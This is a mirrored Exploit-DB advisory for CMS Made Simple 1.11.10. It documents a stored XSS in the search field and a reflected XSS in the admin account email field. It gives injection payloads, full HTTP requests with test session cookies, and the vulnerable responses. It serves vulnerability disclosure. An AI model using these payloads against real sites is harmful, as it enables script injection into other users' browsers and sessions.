bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/32668.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

104 lines
No EOL
3.1 KiB
Text
Raw Blame History

Exploit Title : CMS Made Simple 1.11.10 Multiple XSS Vulnerability
Google dork : N/A
Date : 02/04/2014
Exploit Author : Blessen Thomas
Vendor Homepage : http://www.cmsmadesimple.org/
Software Link : N/A
Version : 1.11.10
Tested on : Windows 7 hosted in WAMP server
Type of Application : open source content management system,
Stored XSS :
Login to the admin portal and access search functionality
http://localhost/cmsmadesimple-1.11.10-full/index.php
Here the " search " parameter is vulnerable to stored xss.
Payload :
'">><marquee><img src=x onerror=confirm(1)
request:
POST http://localhost/cmsmadesimple-1.11.10-full/ HTTP/1.1
Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0)
Gecko/20100101 Firefox/28.0 Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer:
http://localhost/cmsmadesimple-1.11.10-full/index.php Cookie:
_sx_=3ee623ee0900c03b; cms_admin_user_id=1;
cms_passhash=fcb88b76587f0658cd2481a004312918;
CMSSESSIDd508249c=qijlp266idmf9sjc51bai74lg7;
PHPSESSID=5fvasiledip329l0bhr2ulb1j0;
CMSSESSID7a29d042=qv3lpa3fpdflsmqac1icp5cfe7 Connection: keep-alive
Content-Type: application/x-www-form-urlencoded Content-Length: 153
mact=Search%2Ccntnt01%2Cdosearch%2C0&cntnt01returnid=15&cntnt01searchinput=%27%22%3E%3E%3Cmarquee%3E%3Cimg+src%3Dx+onerror%3Dconfirm%281%29&submit=Submit
response :
<div id="search" class="core-float-right">
'">><marquee><img src=x onerror=confirm(1)
</div>
<a href="http://localhost/cmsmadesimple-1.11.10-full/"
title="Home Page, shortcut key=1" >CMS Made Simple Site</a>
</div>
Reflected XSS :
Login to the admin portal and click the "My Preferences" and click "My
account" section.
Here , the "email address" parameter is vulnerable to reflected XSS.
Payload :
"";</script><script>alert(0)</script><"
request :
POST
http://127.0.0.1/cmsmadesimple-1.11.10-full/admin/myaccount.php?_sx_=1c8c76366630b299
HTTP/1.1
Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0)
Gecko/20100101 Firefox/28.0 Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer:
http://127.0.0.1/cmsmadesimple-1.11.10-full/admin/myaccount.php?_sx_=1c8c76366630b299Cookie:
_sx_=1c8c76366630b299; cms_admin_user_id=1;
cms_passhash=fcb88b76587f0658cd2481a004312918;
CMSSESSIDd508249c=71ougg9mi3ikiilatfc0851no5 Connection: keep-alive
Content-Type: application/x-www-form-urlencoded Content-Length: 103
active_tab=maintab&user=test&password=&passwordagain=&firstname=&lastname=&email="";</script><script>alert(0)</script><"&submit_account=Submit
response :
</aside> </div> <!-- end sidebar //--> <!-- start main
--> <div id="oe_mainarea" class="cf"> <aside class="message
pageerrorcontainer" role="alert"><p>The email address entered is
invalid: "";</script><script>alert(0)</script><"</p></aside><article
role="main" class="content-inner"><header class="pageheader
cf"><h1>My&nbsp;Account</h1><script type="text/javascript">
Reference in a new issue View git blame Copy permalink